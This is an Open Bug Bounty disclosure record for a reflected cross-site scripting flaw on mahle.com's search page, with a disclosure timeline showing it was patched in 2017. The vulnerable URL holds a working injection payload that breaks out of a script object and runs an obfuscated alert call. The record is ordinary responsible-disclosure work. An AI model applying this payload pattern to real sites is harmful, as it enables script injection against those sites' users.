mahle.com XSS vulnerability

2017-08-20T13:28:00
ID OBB:280458
Type openbugbounty
Reporter PedroR
Modified 2017-09-25T08:44:00

Description

Vulnerable URL:
https://www.mahle.com/mahle/en/search/?q="}};%0Atop["al"%2B"ert"]("OpenBugBounty");%0Avar Suche = {url : "/search",loading : "",params : { lang: "EN",langcontext: "lang_en",hash: "",as_sitesearch:"www.mahle.com",sitecontext: "www.mahle.com",q : "
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 109891
VIP website status:| No
Check mahle.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 20 August, 2017 13:28 GMT
Generic security notifications sent to website owner| 20 August, 2017 13:31 GMT
Customized security notification sent to website owner| 20 August, 2017 13:31 GMT
Notification sent to subscribers (without technical details)| 20 August, 2017 14:17 GMT
Vulnerability details disclosed by researcher| 24 September, 2017 17:23 GMT
Vulnerability patched by the website owner| 25 September, 2017 08:44 GMT